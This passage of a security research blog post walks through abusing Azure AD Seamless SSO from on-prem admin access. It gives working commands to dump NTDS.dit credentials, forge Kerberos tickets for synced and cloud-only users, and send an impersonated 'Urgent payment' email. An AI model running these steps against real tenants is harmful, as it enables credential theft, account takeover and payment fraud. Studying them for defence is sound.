<p><strong>Tip!</strong> If you want to create proper looking ImmutableId, use the following command:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Create an ImmutableId</span>
<span class="no">[convert]</span><span class="p">::</span><span class="n">ToBase64String</span><span class="p">((</span><span class="nb">New-Guid</span><span class="p">).</span><span class="n">ToByteArray</span><span class="p">())</span></code></pre></div></p>

<pre><code>yMsQmdfNEE+Y84RamHtZ7Q==
</code></pre>

<h1 id="active-directory-and-desktop-sso-seamless-sso">Active Directory and Desktop SSO (Seamless SSO)</h1>

<h2 id="introduction-3">Introduction</h2>

<p>Azure AD and Microsoft 365 supports various <a href="https://docs.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn" target="_blank">authentication methods</a>, of which Desktop SSO is one.
Together with Pass Through Authentication (PTA), Desktop SSO is currently recommended instead of AD FS by Microsoft.</p>

<p>Desktop SSO is using Kerberos for authentication. When configured, Azure AD Connect creates a computer account called AZUREADSSOACC in on-prem AD.
The password of the AZUREADSSOACC account is sent as plain-text to Azure AD during the configuration.</p>

<p>The Kerberos tickets are encrypted using the NTHash (MD4) of the password and Azure AD is using the sent password to decrypt the tickets.</p>

<p>Same way than in Identity Federation token signing certificates, if the password is known, you can create Kerberos tickets for any user of the tenant.</p>

<h2 id="dumping-the-azureadssoacc-password">Dumping the AZUREADSSOACC password</h2>

<p>Because the Kerberos ticket is encrypted using the NTHash, we only need to know that hash! There are <a href="https://adsecurity.org/?p=2398" target="_blank">many ways for dumping the AD passwords</a>, but I&rsquo;m using the following method:</p>

<ul>
<li>Dump the AD database using <a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753343(v=ws.11)" target="_blank">Ntdsutil</a></li>
<li>Extract the password hash using <a href="https://www.dsinternals.com/en/dumping-ntds-dit-files-using-powershell/" target="_blank">DSInternals</a></li>
</ul>

<p>To dump NTDS.dit and registry, use the following command in any DC:</p>

<pre><code>ntdsutil &quot;ac i ntds&quot; &quot;ifm” &quot;create full C:\temp&quot; q q
</code></pre>

<p>Now the AD and registry are dumped to C:\temp and we can extract the password hash using DSInternals.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Install DSInternals (if not done yet)</span>
<span class="n">Install-Module</span> <span class="n">DSInternals</span>

<span class="c"># Import DSInternals</span>
<span class="nb">Import-Module</span> <span class="n">DSInternals</span>

<span class="c"># Get the Boot key</span>
<span class="nv">$key</span> <span class="p">=</span> <span class="nb">Get-BootKey</span> <span class="n">-SystemHivePath</span> <span class="s1">&#39;C:\temp\registry\SYSTEM&#39;</span>

<span class="c"># Get the password hash of AZUREADSSOACC</span>
<span class="p">(</span><span class="nb">Get-ADDBAccount</span> <span class="n">-SamAccountName</span> <span class="s1">&#39;AZUREADSSOACC$&#39;</span> <span class="n">-DBPath</span> <span class="s1">&#39;C:\temp\Active Directory\ntds.dit&#39;</span> <span class="n">-BootKey</span> <span class="nv">$key</span><span class="p">).</span><span class="n">NTHash</span> <span class="p">|</span> <span class="nb">Format-Hex</span></code></pre></div></p>

<pre><code>           Path:  
           00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
00000000   97 B7 45 CB ED 7B 9D D6 FE 6C 99 20 24 BC 38 F4   ·EËí{ Öþl  $¼8ô
</code></pre>

<p>From the output we can find the password hash of the AZUREADSSOACC: 97B745CBED7B9DD6FE6C992024BC38F4</p>

<h2 id="creating-kerberos-tickets-for-synced-users">Creating Kerberos tickets for synced users</h2>

<p>Same way than in Identity Federation, where ImmutableId is used as an identifier, DesktopSSO uses on-prem AD Security Identifier (SID) as an identifier. So, to create valid Kerberos tickets, the SID of the user must be known.</p>

<p>To list users&rsquo; SIDs from Azure AD, use the AzureAD module:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Connect to AzureAD (if not done yet)</span>
<span class="nb">Connect-AzureAD</span>

<span class="c"># List users names and SIDs:</span>
<span class="nb">Get-AzureADUser</span> <span class="p">|</span> <span class="n">Select</span> <span class="n">UserPrincipalName</span><span class="p">,</span><span class="n">OnPremisesSecurityIdentifier</span></code></pre></div></p>

<pre><code>UserPrincipalName                                OnPremisesSecurityIdentifier                  
-----------------                                ----------------------------                  
admin@company.com                        
admin@company.onmicrosoft.com                
AlexW@company.com                                S-1-5-21-854168551-3279074086-2022502410-1104 
AllanD@company.com                               S-1-5-21-854168551-3279074086-2022502410-1105 
DiegoS@company.com                               S-1-5-21-854168551-3279074086-2022502410-1106 
IsaiahL@company.com                              S-1-5-21-854168551-3279074086-2022502410-1107 
JoniS@company.com                                S-1-5-21-854168551-3279074086-2022502410-1108 
Sync_SERVER_10923a482f0a@company.onmicrosoft.com                                                        
</code></pre>

<p>Now we are able to create Kerberos ticket to AlexW:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Create a new Kerberos ticket</span>
<span class="nv">$kerberos</span><span class="p">=</span><span class="nb">New-AADIntKerberosTicket</span> <span class="n">-SidString</span> <span class="s2">&#34;S-1-5-21-854168551-3279074086-2022502410-1104&#34;</span> <span class="n">-Hash</span> <span class="s2">&#34;97B745CBED7B9DD6FE6C992024BC38F4&#34;</span></code></pre></div></p>

<p>With the kerberos ticket, you can now get OAuth Access Token to be used with AADInternals functions.
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Get an access token for Exchange Online</span>
<span class="nv">$at</span><span class="p">=</span><span class="nb">Get-AADIntAccessTokenForEXO</span> <span class="n">-KerberosTicket</span> <span class="nv">$kerberos</span> <span class="n">-Domain</span> <span class="n">company</span><span class="p">.</span><span class="n">com</span>

<span class="c"># Send a message using &#34;Outlook&#34;</span>
<span class="nb">Send-AADIntOutlookMessage</span> <span class="n">-AccessToken</span> <span class="nv">$at</span> <span class="n">-Recipient</span> <span class="s2">&#34;someone@company.com&#34;</span> <span class="n">-Subject</span> <span class="s2">&#34;Urgent payment&#34;</span> <span class="n">-Message</span> <span class="s2">&#34;&lt;h1&gt;Urgent!&lt;/h1&gt;&lt;br&gt;The following bill should be paid asap.&#34;</span></code></pre></div></p>

<h2 id="creating-kerberos-tickets-for-cloud-only-users">Creating Kerberos tickets for cloud-only users</h2>

<p>If the Active Directory administrators have access to Azure AD Connect, they can set SID for any cloud-user.
This way Kerberos tokens can be created also for cloud-only users. The only requirement is that the SID is a proper
<a href="https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc778824(v=ws.10)" target="_blank">SID</a>.</p>

<blockquote>
<p><strong>Note!</strong> Changing SID of cloud-only admin users is now blocked by Microsoft!</p>
</blockquote>

<p>Setting SID for cloud-only users:
<div class="highlight"><pre class="chroma"><code class="language-powershell" data-lang="powershell"><span class="c"># Create a SID object. MUST be unique within the tenant.</span>
<span class="nv">$objSID</span> <span class="p">=</span> <span class="nb">New-Object</span> <span class="n">System</span><span class="p">.</span><span class="n">Security</span><span class="p">.</span><span class="n">Principal</span><span class="p">.</span><span class="n">SecurityIdentifier</span><span class="p">(</span><span class="s2">&#34;S-1-5-0-0-0-0-1&#34;</span><span class="p">)</span>

<span class="c"># Create a byte array for the binary form of the SID</span>
<span class="nv">$b64SID</span> <span class="p">=</span> <span class="no">[System.Byte[]]</span><span class="p">::</span><span class="n">CreateInstance</span><span class="p">(</span><span class="no">[System.Byte]</span><span class="p">,</span><span class="n">28</span><span class="p">)</span>

<span class="c"># Export binary SID to the variable</span>
<span class="nv">$objSID</span><span class="p">.</span><span class="n">GetBinaryForm</span><span class="p">(</span><span class="nv">$b64SID</span><span class="p">,</span><span class="n">0</span><span class="p">)</span>

<span class="c"># Convert the binary SID to Base 64 string</span>
<span class="nv">$strB64SID</span><span class="p">=</span><span class="no">[convert]</span><span class="p">::</span><span class="n">ToBase64String</span><span class="p">(</span><span class="nv">$b64SID</span><span class="p">)</span>

<span class="c"># Set the SID for the user</span>
<span class="nb">Set-AADIntAzureADObject</span> <span class="n">-CloudAnchor</span> <span class="s2">&#34;User_d8e43f6f-d97c-4377-a547-ad1f51d5bbc7&#34;</span> <span class="n">-onPremiseSecurityIdentifier</span> <span class="nv">$strB64SID</span></code></pre></div></p>

<pre><code>CloudAnchor            : User_d8e43f6f-d97c-4377-a547-ad1f51d5bbc7
ErrorDetails           : ErrorDetails
ObjectType             : User
ResultCode             : Success
ResultErrorCode        : 0
ResultErrorDescription : ResultErrorDescription
SourceAnchor           : abc
SyncOperation          : Add
</code></pre>

<p>If successful, you can now create a Kerberos ticket for the user using the SID &ldquo;S-1-5-0-0-0-0-1&rdquo;.</p>

<h1 id="references">References</h1>

<ul>
<li>Adam Chester: <a href="https://blog.xpnsec.com/azuread-connect-for-redteam/" target="_blank">Azure AD Connect for Red Teamers</a></li>
<li>Michael Grafnetter: <a href="https://www.dsinternals.com/en/how-azure-active-directory-connect-syncs-passwords/" target="_blank">How Azure Active Directory Connect Syncs Passwords?</a></li>
<li>Michael Grafnetter: <a href="https://www.dsinternals.com/en/dumping-ntds-dit-files-using-powershell/" target="_blank">Dumping the contents of ntds.dit files using PowerShell</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-azure-ad-connect" target="_blank">What is Azure AD Connect?</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/azure/active-directory/users-groups-roles/directory-assign-admin-roles" target="_blank">Administrator role permissions in Azure Active Directory</a></li>
<li>Microsoft: <a href="https://docs.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn" target="_blank">Choose the right authentication method for your Azure Active Directory hybrid identity solution</a></li>
<li>Sean Metcalf: <a href="https://adsecurity.org/?p=2398" target="_blank">How Attackers Dump Active Directory Database Credentials</a></li>
</ul>
		</div>
		
<div class="post__tags tags clearfix">
	<img class="icon icon-tag" src="/images/tags.png" width="16" height="16" viewBox="0 0 16 16">
	
	<ul class="tags__list">
		<li class="tags__item"><a class="tags__link" href="/tags/azure-active-directory/" rel="tag">Azure Active Directory</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/azure/" rel="tag">Azure</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/reconnaissance/" rel="tag">reconnaissance</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/security/" rel="tag">security</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/on-prem/" rel="tag">on-prem</a></li>
		<li class="tags__item"><a class="tags__link" href="/tags/admin/" rel="tag">admin</a></li>
	</ul>
</div>

		<div class="post__tags tags clearfix">
<ul class="tags__list">
	<li class="tags__item"><a class="tags__link" href="http://twitter.com/intent/tweet?url=http%3a%2f%2fo365blog.com%2fpost%2fon-prem_admin%2f&text=Unnoticed%20sidekick%3a%20Getting%20access%20to%20cloud%20as%20an%20on-prem%20admin&tw_p=tweetbutton" title="Share in Twitter" target="_blank" rel="nofollow"><i class="fa fa-twitter" aria-hidden="true"></i></a></li>
	<li class="tags__item"><a class="tags__link" href="https://www.linkedin.com/shareArticle?url=http%3a%2f%2fo365blog.com%2fpost%2fon-prem_admin%2f&mini=true&title=Unnoticed%20sidekick%3a%20Getting%20access%20to%20cloud%20as%20an%20on-prem%20admin&summary=&source=o365blog.com" title="Share in LinkedIn" target="_blank" rel="nofollow"><i class="fa fa-linkedin" aria-hidden="true"></i></a></li>
</ul>
</div>
	</article>
	
<div class="authorbox clearfix">
	<figure class="authorbox__avatar">
		<img alt="Dr Nestori Syynimaa (@DrAzureAD) avatar" src="/images/nestori.jpg" class="avatar" height="90" width="90">
	</figure>
	<div class="authorbox__header">
		<span class="authorbox__name">About Dr Nestori Syynimaa (@DrAzureAD)</span>
	</div>
	<div class="authorbox__description">
		Dr Syynimaa works as Senior Principal Information Security Researcher at Secureworks CTU (Counter Threat Unit). <br> Before moving to his current position, Dr Syynimaa worked as a CIO, consultant, trainer, and university lecturer for over 20 years. He is a regular speaker in scientific and professional conferences related to Microsoft 365 and Azure AD security. <br><br>Dr Syynimaa is Microsoft Certified Expert (Microsoft 365), Microsoft Certified Azure Solutions Architect Expert, Microsoft Certified Trainer, Microsoft MVP (Enterprise Mobility, Identity and Access &amp; Intune), and Microsoft Most Valuable Security Researcher (MVR).
	</div>
</div>
	
<nav class="post-nav row clearfix" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement">
	<div class="post-nav__item post-nav__item--prev col-1-2">
		<a class="post-nav__link" href="/post/admin/" rel="prev"><span class="post-nav__caption">«Previous</span><p class="post-nav__post-title">Keys of the kingdom: Playing God as Global Admin</p></a>
	</div>
	<div class="post-nav__item post-nav__item--next col-1-2">
		<a class="post-nav__link" href="/post/mfa/" rel="next"><span class="post-nav__caption">Next»</span><p class="post-nav__post-title">Deep-dive to Azure AD MFA: Creating a custom authenticator app</p></a>
	</div>
</nav>

	
<div class="comments">
	<div id="disqus_thread"></div>
<script>
    var disqus_config = function () {
    
    
    
    };
    (function() {
        if (["localhost", "127.0.0.1"].indexOf(window.location.hostname) != -1) {
            document.getElementById('disqus_thread').innerHTML = 'Disqus comments not available by default when the website is previewed locally.';
            return;
        }
        var d = document, s = d.createElement('script'); s.async = true;
        s.src = '//' + "o365blog-com" + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
<a href="https://disqus.com" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a>
</div>

</main>

<aside class="sidebar" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
	
<div class="widget-search widget">
	<form class="widget-search__form" role="search" method="get" action="//google.com/search">
		<label>
			<span class="screen-reader-text">Search for:</span>
			<input class="widget-search__field" type="search" placeholder="SEARCH..." value="" name="q">
		</label>
		<input class="widget-search__submit" type="submit" value="Search">
		<input type="hidden" name="sitesearch" value="http://o365blog.com" />
	</form>
</div>
	
<div class="widget-recent widget">
	<h4 class="widget__title">Recent Posts</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="/post/pta/">Exploiting Azure AD PTA vulnerabilities: Creating backdoor and harvesting credentials</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/gmsa/">Hunt for the gMSA secrets</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/august_2022/">AADInternals World Tour August 2022: USA</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/deviceidentity/">Stealing and faking Azure AD device identities</a></li>
			<li class="widget__item"><a class="widget__link" href="/post/partners/">Microsoft partners: The Good, The Bad, or The Ugly?</a></li>
		</ul>
	</div>
</div>

	
<div class="widget-categories widget">
	<h4 class="widget__title">Categories</h4>
	<div class="widget__content">
		<ul class="widget__list">
			<li class="widget__item"><a class="widget__link" href="/categories/"></a></li>
			<li class="widget__item"><a class="widget__link" href="/categories/article">Article</a></li>
			<li class="widget__item"><a class="widget__link" href="/categories/blog">Blog</a></li>
		</ul>
	</div>
</div>
	
<div class="widget-social widget">
	<h4 class="widget-social__title widget__title">Social</h4>
	<div class="widget-social__content widget__content">
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Twitter" rel="noopener noreferrer" href="https://twitter.com/DrAzureAD" target="_blank">
				<svg class="widget-social__link-icon icon-twitter" viewBox="0 0 384 312" width="24" height="24" xmlns="http://www.w3.org/2000/svg" fill="#fff"><path d="m384 36.9c-14.1 6.3-29.3 10.5-45.2 12.4 16.3-9.7 28.8-25.2 34.6-43.6-15.2 9-32.1 15.6-50 19.1-14.4-15.2-34.9-24.8-57.5-24.8-43.5 0-78.8 35.3-78.8 78.8 0 6.2.7 12.2 2 17.9-65.5-3.3-123.5-34.6-162.4-82.3-6.7 11.6-10.6 25.2-10.6 39.6 0 27.3 13.9 51.4 35 65.6-12.9-.4-25.1-4-35.7-9.9v1c0 38.2 27.2 70 63.2 77.2-6.6 1.8-13.6 2.8-20.8 2.8-5.1 0-10-.5-14.8-1.4 10 31.3 39.1 54.1 73.6 54.7-27 21.1-60.9 33.7-97.8 33.7-6.4 0-12.6-.4-18.8-1.1 34.9 22.4 76.3 35.4 120.8 35.4 144.9 0 224.1-120 224.1-224.1 0-3.4-.1-6.8-.2-10.2 15.4-11.1 28.7-25 39.3-40.8z"/></svg>
				<span>Twitter</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="" rel="noopener noreferrer" href="https://linkedin.com/in/nestori" target="_blank">
				<svg class="widget-social__link-icon icon-linkedin" viewBox="0 0 352 352" width="24" height="24" fill="#fff" xmlns="http://www.w3.org/2000/svg"><path d="M0,40v272c0,21.9,18.1,40,40,40h272c21.9,0,40-18.1,40-40V40c0-21.9-18.1-40-40-40H40C18.1,0,0,18.1,0,40z M312,32 c4.6,0,8,3.4,8,8v272c0,4.6-3.4,8-8,8H40c-4.6,0-8-3.4-8-8V40c0-4.6,3.4-8,8-8H312z M59.5,87c0,15.2,12.3,27.5,27.5,27.5 c15.2,0,27.5-12.3,27.5-27.5c0-15.2-12.3-27.5-27.5-27.5C71.8,59.5,59.5,71.8,59.5,87z M187,157h-1v-21h-45v152h47v-75 c0-19.8,3.9-39,28.5-39c24.2,0,24.5,22.4,24.5,40v74h47v-83.5c0-40.9-8.7-72-56.5-72C208.5,132.5,193.3,145.1,187,157z M64,288h47.5 V136H64V288z"/></svg>
				<span>LinkedIn</span>
			</a>
		</div>
		<div class="widget-social__item widget__item">
			<a class="widget-social__link widget__link btn" title="Email" href="mailto:nestori.syynimaa@gerenios.com">
				<svg class="widget-social__link-icon icon-mail" viewBox="0 0 416 288" width="24" height="24" xmlns="http://www.w3.org/2000/svg" fill="#fff"><path d="m0 16v256 16h16 384 16v-16-256-16h-16-384-16zm347 16-139 92.5-139-92.5zm-148 125.5 9 5.5 9-5.5 167-111.5v210h-352v-210z"/></svg>
				<span>nestori.syynimaa@gerenios.com</span>
			</a>
		</div>
	</div>
</div>

	
<div class="widget-taglist widget">
	<h4 class="widget__title">Tags</h4>
	<div class="widget__content">
		<a class="widget__link widget__link--taglist" href="/tags/aadconnect" title="aadconnect">aadconnect (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/aadinternals" title="aadinternals">aadinternals (10)</a>
		<a class="widget__link widget__link--taglist" href="/tags/abusing" title="abusing">abusing (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/active-directory" title="active-directory">active-directory (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/adfs" title="adfs">adfs (5)</a>
		<a class="widget__link widget__link--taglist" href="/tags/admin" title="admin">admin (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/administration" title="administration">administration (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/authentication" title="authentication">authentication (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azure" title="azure">azure (20)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azure-active-directory" title="azure-active-directory">azure-active-directory (27)</a>
		<a class="widget__link widget__link--taglist" href="/tags/azuread" title="azuread">azuread (4)</a>
		<a class="widget__link widget__link--taglist" href="/tags/backdoor" title="backdoor">backdoor (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/blackhat" title="blackhat">blackhat (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/blue-team" title="blue-team">blue-team (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/bprt" title="bprt">bprt (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/browser" title="browser">browser (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/compromise" title="compromise">compromise (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/conferences" title="conferences">conferences (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/defcon" title="defcon">defcon (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/desktop-sso" title="desktop-sso">desktop-sso (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/device" title="device">device (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/dns" title="dns">dns (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/email" title="email">email (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/encryption" title="encryption">encryption (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/exchange" title="exchange">exchange (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/federation" title="federation">federation (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/forensics" title="forensics">forensics (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/gdpr" title="gdpr">gdpr (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/global-administrator" title="global-administrator">global-administrator (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/graph" title="graph">graph (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/groups" title="groups">groups (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/guest" title="guest">guest (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/hybrid-join" title="hybrid-join">hybrid-join (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/identity" title="identity">identity (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/inactive" title="inactive">inactive (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/insider" title="insider">insider (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/intune" title="intune">intune (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/join" title="join">join (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/logs" title="logs">logs (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mailbox" title="mailbox">mailbox (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mdm" title="mdm">mdm (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/mfa" title="mfa">mfa (6)</a>
		<a class="widget__link widget__link--taglist" href="/tags/office-365" title="office-365">office-365 (9)</a>
		<a class="widget__link widget__link--taglist" href="/tags/office365" title="office365">office365 (9)</a>
		<a class="widget__link widget__link--taglist" href="/tags/on-prem" title="on-prem">on-prem (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/onedrive" title="onedrive">onedrive (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/outsider" title="outsider">outsider (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/partner" title="partner">partner (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/password" title="password">password (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/persistence" title="persistence">persistence (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/phishing" title="phishing">phishing (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/planner" title="planner">planner (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/powershell" title="powershell">powershell (13)</a>
		<a class="widget__link widget__link--taglist" href="/tags/prt" title="prt">prt (6)</a>
		<a class="widget__link widget__link--taglist" href="/tags/pta" title="pta">pta (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/recon" title="recon">recon (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/reconnaissance" title="reconnaissance">reconnaissance (4)</a>
		<a class="widget__link widget__link--taglist" href="/tags/seamless-sso" title="seamless-sso">seamless-sso (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/security" title="security">security (31)</a>
		<a class="widget__link widget__link--taglist" href="/tags/sso" title="sso">sso (2)</a>
		<a class="widget__link widget__link--taglist" href="/tags/sync" title="sync">sync (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/synchronisation" title="synchronisation">synchronisation (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/t2" title="t2">t2 (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/talks" title="talks">talks (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/teams" title="teams">teams (3)</a>
		<a class="widget__link widget__link--taglist" href="/tags/user" title="user">user (1)</a>
		<a class="widget__link widget__link--taglist" href="/tags/virtual-machine" title="virtual-machine">virtual-machine (1)</a>
	</div>
</div>
</aside>

	</div>
		<footer class="footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter">
			<div class="container container-inner">
				<p class="footer__copyright"><span><a href="https://creativecommons.org/licenses/by/4.0/" target="_blank"><img src="/images/CC-BY.png"></a> </span></p>
			</div>
		</footer>
	</div>

<script>
	var navigation = responsiveNav(".menu", {
		navClass: "menu--collapse",
	});
</script>
</body>
</html>
